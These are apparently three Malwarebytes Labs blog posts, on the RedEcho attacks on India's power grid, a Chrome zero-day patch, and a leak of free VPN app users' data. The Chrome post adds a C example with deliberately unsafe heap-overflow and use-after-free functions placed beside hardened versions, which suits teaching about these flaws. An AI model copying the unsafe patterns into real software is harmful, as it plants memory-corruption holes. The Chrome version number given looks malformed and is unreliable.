“In the lead-up to the May 2020 skirmishes, we observed a noticeable increase in the provisioning of PlugX malware C2 infrastructure, much of which was subsequently used in intrusion activity targeting Indian organizations,” the report said. “The PlugX activity included the targeting of multiple Indian government, public sector, and defense organizations from at least May 2020.”

RedEcho is the latest APT group to target India via its energy sector using ShadowPad, a modular backdoor that has been in use since 2017. The company also noted in its report that ShadowPad is shared among other state-backed threat actor groups who are affiliated with both the Chinese Ministry of State Security (MSS) and the People’s Liberation Army (PLA). Some of these groups include APT41 (aka Barium, among others), Icefog, KeyBoy (aka Pirate Panda), Tick, and Tonto Team.

RedEcho allegedly penetrated a total of 12 organizations, including four of India’s five Regional Load Despatch Centres (RLDCs) and two State Load Despatch Centres (SLDCs). These organizations are responsible for ensuring the optimum scheduling and dispatching of electricity based on supply and demand across regions in India. According to Recorded Future, “The targeting of Indian critical infrastructure offers limited economic espionage opportunities; however, we assess they pose significant concerns over potential pre-positioning of network access to support Chinese strategic objectives.”

This isn’t the first time India’s critical infrastructure has been in the crosshairs. In November 2020, APT41 had set their sights on India’s oil and gas sectors. Media reports suggested that the October 2020 power outage in Mumbai and neighboring areas, which crippled train transportation, closed the stock exchange, and hampered those working from home amidst the pandemic, was sabotage. Some called the outage a “warning shot” from China.

“Profoundly disturbed”

Subrahmanyam Jaishankar, India’s foreign minister, described the relationship between India and China as “profoundly disturbed”. RedEcho is just one threat actor group that has entered the scene, but we can expect that they won’t be the last. And things might only get worse because of rising geopolitical tensions, not just between China and India but also between other countries that are currently in dispute.

Remember the December 2016 power grid attack against Ukraine by Russian hackers?

And to accentuate the likely reality that more attacks against critical infrastructure will happen in the future, Dragos Inc, a cybersecurity firm specializing in industrial cybersecurity, released its “2020 Year in Review” report in late February 2021. It determined that threats against industrial control systems (ICSs) and operational technology (OT) have increased threefold.

It’s worth mentioning that not all attacks on critical infrastructure are backed by nation states. Even so, the outcome is still the endangerment of lives. Take, for example, the attempted poisoning of a Florida city’s drinking water last month, which was likely an act of vandalism, but could have had the impact of a terrorist attack.

The post China’s RedEcho accused of targeting India’s power grids appeared first on Malwarebytes Labs.

Update now! Chrome fix patches in-the-wild zero-day

The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability (CVE-2021-21166) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is not the first time that Chrome’s audio component was targeted by an exploit.

No details available

Further details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.

An object lifecycle is used in object oriented programming to describe the time between an object’s creation and its destruction. Outside of that lifecycle the object is no longer valid, and using it anyway can lead to a vulnerability.

For example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn’t go well, and memory is mismanaged, that could lead to a flaw – or vulnerability – in the program.

More vulnerabilities patched in the update

As usual, Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:

Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).

The CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

  • CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.
  • CVE-2021-21160: Heap buffer overflow in WebAudio.
  • CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.
  • CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.
  • CVE-2021-21164: Insufficient data validation in Chrome for iOS.
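The two memory-safety bug classes in the list above, heap buffer overflow and use after free, in miniature, as an added example that is not Chrome’s code: a constructed heap-allocated audio sample buffer with an unchecked append beside a bounds-checked one, and a destroy routine that leaves the caller’s pointer dangling beside one that clears it. All names (AudioBuf, audiobuf_*) are invented for this illustration.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Constructed example object, not Chrome code: a heap-allocated buffer of
 * audio samples with an explicit create / use / destroy lifecycle. */
typedef struct {
    size_t capacity;  /* samples the heap block can hold */
    size_t used;      /* samples written so far */
    short *samples;   /* the heap region an overflow would run past */
} AudioBuf;

/* Creation: memory is allocated and the object becomes valid. */
AudioBuf *audiobuf_create(size_t capacity) {
    AudioBuf *b = calloc(1, sizeof *b);
    if (b == NULL) return NULL;
    b->samples = calloc(capacity, sizeof *b->samples);
    if (b->samples == NULL) { free(b); return NULL; }
    b->capacity = capacity;
    return b;
}

/* Heap-buffer-overflow pattern: nothing stops the copy from running past
 * capacity into whatever the allocator placed after samples[]. */
void audiobuf_append_unchecked(AudioBuf *b, const short *in, size_t n) {
    memcpy(b->samples + b->used, in, n * sizeof *in);
    b->used += n;
}

/* Hardened append: rejects any write that would cross the boundary.
 * used never exceeds capacity, so the subtraction cannot wrap. */
int audiobuf_append(AudioBuf *b, const short *in, size_t n) {
    if (b == NULL || n > b->capacity - b->used) return -1;
    memcpy(b->samples + b->used, in, n * sizeof *in);
    b->used += n;
    return 0;
}

/* Use-after-free pattern: memory is reclaimed but the caller still holds
 * the old address, so any later use reads freed memory. */
void audiobuf_destroy_dangling(AudioBuf *b) {
    free(b->samples);
    free(b);
}

/* Hardened destroy: clears the caller's pointer, so a later use becomes a
 * NULL check instead of a read of freed memory. Safe to call twice. */
void audiobuf_destroy(AudioBuf **bp) {
    if (bp == NULL || *bp == NULL) return;
    free((*bp)->samples);
    free(*bp);
    *bp = NULL;
}

/* A "use" after destroy is only safe because the pointer was cleared. */
size_t audiobuf_used(const AudioBuf *b) {
    return b == NULL ? 0 : b->used;
}
```

Building with a sanitizer (for example gcc or clang with -fsanitize=address) and calling the unchecked or dangling variants is the quickest way to see how such a defect is reported during testing.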

When more details about the vulnerabilities come to light it’s possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.

How to update

The easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time.

My preferred method is to have Chrome open the page chrome://settings/help, which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is Relaunch the browser.

Chrome up-to-date
After the update your version should be at 89.0.4.4389.72 or later

Stay safe, everyone!

The post Update now! Chrome fix patches in-the-wild zero-day appeared first on Malwarebytes Labs.

21 million free VPN users’ data exposed

Detailed credentials for more than 21 million mobile VPN app users were swiped and advertised for sale online last week, offered by a cyber thief who allegedly stole user data collected by the VPN apps themselves. The data includes email addresses, randomly generated password strings, payment information, and device IDs belonging to users of three VPN apps—SuperVPN, GeckoVPN, and ChatVPN.

The attacks, which have not been confirmed by the VPN developers, represent the most recent privacy broadsides against the VPN industry. Two similar blunders have been revealed to the public since 2019, including one massive data leak that exposed several VPN apps’ empty promises to collect “no logs” of their users’ activity. In that data leak, not only did the VPN providers fail to live up to their words, but they also hoovered up additional data, including users’ email addresses, clear text passwords, IP addresses, home addresses, phone models, and device IDs.

For the average consumer, then, the privacy pitfalls begin to paint an all-too-familiar portrait: Users continue to feel alone when managing their online privacy, even when they rely on tools meant to enhance that privacy.

Cybersecurity researcher Troy Hunt, who wrote about the recent data leak on Twitter, called the entire issue “a mess, and a timely reminder why trust in a VPN provider is so crucial.”

He continued: “This level of logging isn’t what anyone expects when using a service designed to *improve* privacy, not to mention the fact they then leaked all the data.”

The data leak of SuperVPN, GeckoVPN, and ChatVPN

In late February, a user on a popular hacking forum claimed that they’d stolen account information and credentials belonging to the users of three separate VPN apps available on the Google Play store for Android: SuperVPN, GeckoVPN, and ChatVPN.

The three apps vary wildly in popularity. According to Google Play’s count, ChatVPN has earned more than 50,000 installs, GeckoVPN has earned more than 10 million installs, and SuperVPN weighs in as one of the most popular free VPN apps for Android today, with more than 100 million installs to its name.

Despite SuperVPN’s popularity, it is also one of the most harshly reviewed VPN apps for Android devices. Last April, a writer for Tom’s Guide found critical vulnerabilities in the app that so worried him that the review’s headline directed current users to: “Delete it now.” And just one month later, a reviewer at TechRadarPro said that SuperVPN had a “worthless privacy policy” that was cobbled together from other companies’ privacy policies and which directly contradicted itself.

Not more than one year later, that privacy policy has again been thrown into the spotlight with a data leak that calls into question just what types of information the app was actually collecting.

According to the thief who pilfered the information from SuperVPN, GeckoVPN, and ChatVPN, the data for sale includes email addresses, usernames, full names, country names, randomly generated password strings, payment-related data, and a user’s “Premium” status and the corresponding expiration date. Following the forum post, the tech outlet CyberNews also discovered that the stolen data included device serial numbers, phone type and manufacturer information, device IDs, and device IMSI numbers.

According to CyberNews, the data was taken from “publicly available databases that were left vulnerable by the VPN providers due to developers leaving default database credentials in use.”

Past VPN errors

The unfortunate truth about the recent VPN app data leak is that this type of data mishap is nothing new.

In 2019, the popular VPN provider NordVPN confirmed to TechCrunch that it suffered a breach the year before. According to TechCrunch:

“NordVPN told TechCrunch that one of its data centers was accessed in March 2018. ‘One of the data centers in Finland we are renting our servers from was accessed with no authorization,’ said NordVPN spokesperson Laura Tyrell.

The attacker gained access to the server—which had been active for about a month—by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed.”

Separate from the NordVPN breach, last July, seven VPN providers were found to have left 1.2 terabytes of private user data exposed online, according to a report published by the cybersecurity researchers at vpnMentor. According to the report, the exposed data belonged to as many as 20 million users. The data included email addresses, clear text passwords, IP addresses, home addresses, phone models, device IDs, and Internet activity logs.

The seven VPN providers investigated by vpnMentor were:

  • UFO VPN
  • Fast VPN
  • Free VPN
  • Super VPN
  • Flash VPN
  • Secure VPN
  • Rabbit VPN

The researchers at vpnMentor also explained that there was good reason to believe that the seven apps were all made by the same developer. When analyzing the apps, vpnMentor discovered that all of them shared a common Elasticsearch server, were hosted on the same assets, shared the same, single payment recipient—Dreamfii HK Limited—and that at least three of the VPNs shared similar branding and layouts on their websites.

Finally, the report also highlighted the fact that all seven of the apps claimed to keep “no logs” of user activity. Despite this, vpnMentor said that it “found multiple instances of internet activity logs on [the apps’] shared server.”

The report continued: “We viewed detailed activity logs from each VPN, exposing users’ personal information and browsing activities while using the VPNs and unencrypted plain text passwords.”

So, not only did these apps fail to live up to their own words, but they also collected extra user data that most users did not anticipate. After all, most consumers might rightfully assume that a promise to refrain from collecting some potentially sensitive data would extend to a promise to refrain from collecting other types of data.

But, according to vpnMentor, that wasn’t the case, which is a clear breach of user trust.

Let’s put it another way:

Imagine choosing a video baby monitor that promised to never upload your audio recordings to the cloud, only to find that it wasn’t just sending those recordings to an unsecured server, but it was also snapping photos of your baby and sending those pictures along, too. 

Which VPN to trust?

The trust that you place into your VPN provider is paramount.

Remember, a VPN can help protect your traffic from being viewed by your Internet Service Provider, which could be a major telecom company, or it could be a university or a school. A VPN can also help protect you from government requests for your data. For instance, if you’re doing investigative work in another country with a far more restrictive government, a VPN could help obfuscate your Internet activity from that government, should it take interest in you.

The important thing to note here, though, is that a VPN is merely serving as a substitute for who sees your data. When you use a VPN, it isn’t your ISP or a restrictive government viewing your activity—it’s the VPN itself.

So, how do you find a trustworthy VPN provider who is actually going to protect your online activity? Here are a few guidelines:

  • Read trusted, third-party reviews. Many of the issues in the above apps were spotted by good third-party reviewers. When picking a VPN provider, rely on the words of some trusted outlets, such as Tom’s Guide, TechRadar, and CNET.
  • Ensure that a VPN provider has a customer support contact. Several of the VPN apps investigated by vpnMentor lacked any clear way to contact them. If you’re using a product, you deserve reliable, easy-to-reach customer support.
  • Check the VPN’s privacy policy. As we learned above, a privacy policy is not a guarantee of actual privacy protection, but a company’s approach to its privacy policy can offer insight into the company’s thinking, and how much it cares about its promises.
  • Be cautious of free VPNs. As we wrote about last week, free VPNs often come with significant trade-offs, including annoying ads and the surreptitious collection and sale of your data.
  • Consider a VPN made by a company you already trust. More online privacy and cybersecurity companies are offering VPN tools to supplement their current product suite. If you already trust any of those companies—such as Mozilla, Ghostery, ProtonMail, or, yes, Malwarebytes—then there’s good reason to trust their VPN products, too.

It’s a complicated online world out there, but with the right information and the right, forward-looking research, you can stay safe.

The post 21 million free VPN users’ data exposed appeared first on Malwarebytes Labs.